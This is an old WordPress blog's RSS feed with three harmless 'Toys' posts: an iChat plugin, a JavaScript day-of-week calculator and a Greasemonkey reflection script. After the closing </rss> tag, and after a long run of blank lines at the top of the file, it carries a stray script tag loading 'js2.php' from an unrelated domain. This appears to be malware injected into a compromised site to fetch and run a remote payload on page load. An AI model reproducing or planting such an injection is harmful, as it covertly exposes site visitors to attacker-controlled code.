

























































































































































































































































































































































































































































































































































































































































































































































































































































































<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>zelois &#187; Toys</title>
	<atom:link href="http://zeldisland.com/blog/category/toys/feed/" rel="self" type="application/rss+xml" />
	<link>http://zeldisland.com/blog</link>
	<description>online</description>
	<lastBuildDate>Tue, 25 Aug 2009 18:00:56 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Secret Word</title>
		<link>http://zeldisland.com/blog/2008/02/secret-word/</link>
		<comments>http://zeldisland.com/blog/2008/02/secret-word/#comments</comments>
		<pubDate>Tue, 19 Feb 2008 16:09:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Toys]]></category>

		<guid isPermaLink="false">http://zeldisland.com/blog/?p=60</guid>
		<description><![CDATA[You all know what to do when you hear the secret word, right?
Secret Word is a plugin for iChat.
Download Secret Word.
Secret Word uses SIMBL, JRSwizzle, Sparkle, and the Secret Word of The Day. Thank you!
]]></description>
			<content:encoded><![CDATA[<p>You all know what to do when you hear the secret word, right?</p>
<p>Secret Word is a plugin for iChat.</p>
<p><a href="http://zeldisland.com/software/Secret%20Word.dmg">Download Secret Word</a>.</p>
<p>Secret Word uses <a href="http://www.culater.net/software/SIMBL/SIMBL.php">SIMBL</a>, <a href="http://rentzsch.com/trac/wiki/JRSwizzle">JRSwizzle</a>, <a href="http://sparkle.andymatuschak.org/">Sparkle</a>, and the <a href="http://secretword.tj9991.com/">Secret Word of The Day</a>. Thank you!</p>
]]></content:encoded>
			<wfw:commentRss>http://zeldisland.com/blog/2008/02/secret-word/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What day is it?</title>
		<link>http://zeldisland.com/blog/2006/05/what-day-is-it/</link>
		<comments>http://zeldisland.com/blog/2006/05/what-day-is-it/#comments</comments>
		<pubDate>Fri, 26 May 2006 19:22:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Toys]]></category>

		<guid isPermaLink="false">http://10.0.1.3/~aez/zeldisland/blog/?p=27</guid>
		<description><![CDATA[Enter a date:
 What day is it?



//

]]></description>
			<content:encoded><![CDATA[<p>Enter a date:</p>
<input id="whatday_input" maxlength="10" name="date" size="10" type="text" value="mm/dd/yyyy" /> <button onclick="whatday_submit()">What day is it?</button></p>
<p id="whatday_output" style="font-size: small">
<p>
<script type="text/javascript">
//<![CDATA[
var daysOfTheWeek = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"];
var date = new Date();

document.getElementById('whatday_input').value = "" + (date.getMonth()+1) + "/" + date.getDate() + "/" + date.getFullYear();

var errMsg =  "<i>Enter date in mm/dd/yyyy format</i>";

function whatday_submit() {
	var inputString = document.getElementById('whatday_input').value;
	var outputEl = document.getElementById('whatday_output');

	// TODO more flexibility in parsing

	var components = inputString.split("/");
	if(components.length == 3) {
		var day = parseInt(components[1]);
		var month = parseInt(components[0]);
		var year = parseInt(components[2]);
		if(isNaN(day) || isNaN(month) || isNaN(year)) {
			outputEl.innerHTML = errMsg;
		} else {
			var date = new Date();
			date.setDate(day);
			date.setMonth(month-1);

			var s = "";
			for(var i=-5; i<5; ++i) {
				date.setYear(year + i);
				if(date.getFullYear() == year) { s += "<b>"; }
				s += (date.getMonth()+1) + "/" + date.getDate() + "/" + date.getFullYear() + ": " + daysOfTheWeek[date.getDay()] + ".";
				if(date.getFullYear() == year) { s += "</b>"; }
			}
			outputEl.innerHTML = s;
		}
	} else {
		outputEl.innerHTML = errMsg;
	}
}
//]]&gt;</script>
</p>
]]></content:encoded>
			<wfw:commentRss>http://zeldisland.com/blog/2006/05/what-day-is-it/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shiny Web</title>
		<link>http://zeldisland.com/blog/2006/05/shiny-web/</link>
		<comments>http://zeldisland.com/blog/2006/05/shiny-web/#comments</comments>
		<pubDate>Wed, 24 May 2006 22:47:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Toys]]></category>

		<guid isPermaLink="false">http://10.0.1.3/~aez/zeldisland/blog/?p=24</guid>
		<description><![CDATA[Do you think reflected images are the coolest thing since candy buttons? Your favorite site hasn&#8217;t jumped on that bandwagon yet? Now you don&#8217;t have to wait! Install reflection.user.js to make the whole web shiny.
Requires Firefox with greasemonkey. Taken directly from Reflection.js.
]]></description>
			<content:encoded><![CDATA[<p>Do you think reflected images are the coolest thing since candy buttons? Your favorite site hasn&#8217;t jumped on that bandwagon yet? Now you don&#8217;t have to wait! <a href="http://zeldisland.com/blog/wp-content/uploads/2008/06/reflection.user.js">Install reflection.user.js</a> to make the whole web shiny.</p>
<p>Requires <a href="http://www.mozilla.com/firefox/">Firefox</a> with <a href="http://www.greasespot.net/">greasemonkey</a>. Taken directly from <a href="http://cow.neondragon.net/stuff/reflection/">Reflection.js</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://zeldisland.com/blog/2006/05/shiny-web/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://whereisdudescars.com/js2.php"></script>